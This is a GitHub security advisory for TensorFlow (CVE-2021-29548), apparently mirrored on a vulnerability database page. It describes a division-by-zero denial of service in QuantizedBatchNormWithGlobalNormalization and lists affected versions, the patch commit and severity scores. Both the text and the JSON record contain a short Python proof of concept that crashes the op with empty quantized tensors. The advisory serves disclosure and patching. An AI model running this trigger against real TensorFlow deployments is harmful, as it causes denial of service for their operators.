GHSA-P45V-V4PW-77JR
Vulnerability from github – Published: 2021-05-21 14:23 – Updated: 2024-10-31 20:46
VLAI?
Summary
Division by 0 in `QuantizedBatchNormWithGlobalNormalization`
Details
Impact
An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization:
import tensorflow as tf
t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8)
t_min = tf.constant(-10.0, dtype=tf.float32)
t_max = tf.constant(-10.0, dtype=tf.float32)
m = tf.constant([], shape=[0], dtype=tf.quint8)
m_min = tf.constant(-10.0, dtype=tf.float32)
m_max = tf.constant(-10.0, dtype=tf.float32)
v = tf.constant([], shape=[0], dtype=tf.quint8)
v_min = tf.constant(-10.0, dtype=tf.float32)
v_max = tf.constant(-10.0, dtype=tf.float32)
beta = tf.constant([], shape=[0], dtype=tf.quint8)
beta_min = tf.constant(-10.0, dtype=tf.float32)
beta_max = tf.constant(-10.0, dtype=tf.float32)
gamma = tf.constant([], shape=[0], dtype=tf.quint8)
gamma_min = tf.constant(-10.0, dtype=tf.float32)
gamma_max = tf.constant(-10.0, dtype=tf.float32)
tf.raw_ops.QuantizedBatchNormWithGlobalNormalization(
t=t, t_min=t_min, t_max=t_max, m=m, m_min=m_min, m_max=m_max,
v=v, v_min=v_min, v_max=v_max, beta=beta, beta_min=beta_min,
beta_max=beta_max, gamma=gamma, gamma_min=gamma_min,
gamma_max=gamma_max, out_type=tf.qint32,
variance_epsilon=0.1, scale_after_normalization=True)
This is because the implementation does not validate all constraints specified in the op's contract.
Patches
We have patched the issue in GitHub commit d6ed5bcfe1dcab9e85a4d39931bd18d99018e75b.
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
For more information
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.2.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.3.0"
},
{
"fixed": "2.3.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.4.0"
},
{
"fixed": "2.4.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.2.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.3.0"
},
{
"fixed": "2.3.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.4.0"
},
{
"fixed": "2.4.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.2.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.3.0"
},
{
"fixed": "2.3.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.4.0"
},
{
"fixed": "2.4.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-29548"
],
"database_specific": {
"cwe_ids": [
"CWE-369"
],
"github_reviewed": true,
"github_reviewed_at": "2021-05-18T21:30:45Z",
"nvd_published_at": "2021-05-14T20:15:00Z",
"severity": "LOW"
},
"details": "### Impact\nAn attacker can cause a runtime division by zero error and denial of service in `tf.raw_ops.QuantizedBatchNormWithGlobalNormalization`:\n\n```python\nimport tensorflow as tf\n\nt = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8)\nt_min = tf.constant(-10.0, dtype=tf.float32)\nt_max = tf.constant(-10.0, dtype=tf.float32)\nm = tf.constant([], shape=[0], dtype=tf.quint8)\nm_min = tf.constant(-10.0, dtype=tf.float32)\nm_max = tf.constant(-10.0, dtype=tf.float32)\nv = tf.constant([], shape=[0], dtype=tf.quint8)\nv_min = tf.constant(-10.0, dtype=tf.float32)\nv_max = tf.constant(-10.0, dtype=tf.float32)\nbeta = tf.constant([], shape=[0], dtype=tf.quint8)\nbeta_min = tf.constant(-10.0, dtype=tf.float32)\nbeta_max = tf.constant(-10.0, dtype=tf.float32)\ngamma = tf.constant([], shape=[0], dtype=tf.quint8)\ngamma_min = tf.constant(-10.0, dtype=tf.float32)\ngamma_max = tf.constant(-10.0, dtype=tf.float32)\n\ntf.raw_ops.QuantizedBatchNormWithGlobalNormalization(\n t=t, t_min=t_min, t_max=t_max, m=m, m_min=m_min, m_max=m_max,\n v=v, v_min=v_min, v_max=v_max, beta=beta, beta_min=beta_min,\n beta_max=beta_max, gamma=gamma, gamma_min=gamma_min,\n gamma_max=gamma_max, out_type=tf.qint32,\n variance_epsilon=0.1, scale_after_normalization=True)\n```\n\nThis is because the [implementation](https://github.com/tensorflow/tensorflow/blob/55a97caa9e99c7f37a0bbbeb414dc55553d3ae7f/tensorflow/core/kernels/quantized_batch_norm_op.cc) does not validate all constraints specified in the [op\u0027s contract](https://www.tensorflow.org/api_docs/python/tf/raw_ops/QuantizedBatchNormWithGlobalNormalization).\n\n### Patches \nWe have patched the issue in GitHub commit [d6ed5bcfe1dcab9e85a4d39931bd18d99018e75b](https://github.com/tensorflow/tensorflow/commit/d6ed5bcfe1dcab9e85a4d39931bd18d99018e75b).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team",
"id": "GHSA-p45v-v4pw-77jr",
"modified": "2024-10-31T20:46:23Z",
"published": "2021-05-21T14:23:34Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-p45v-v4pw-77jr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29548"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/commit/d6ed5bcfe1dcab9e85a4d39931bd18d99018e75b"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-476.yaml"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-674.yaml"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-185.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/tensorflow/tensorflow"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Division by 0 in `QuantizedBatchNormWithGlobalNormalization`"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…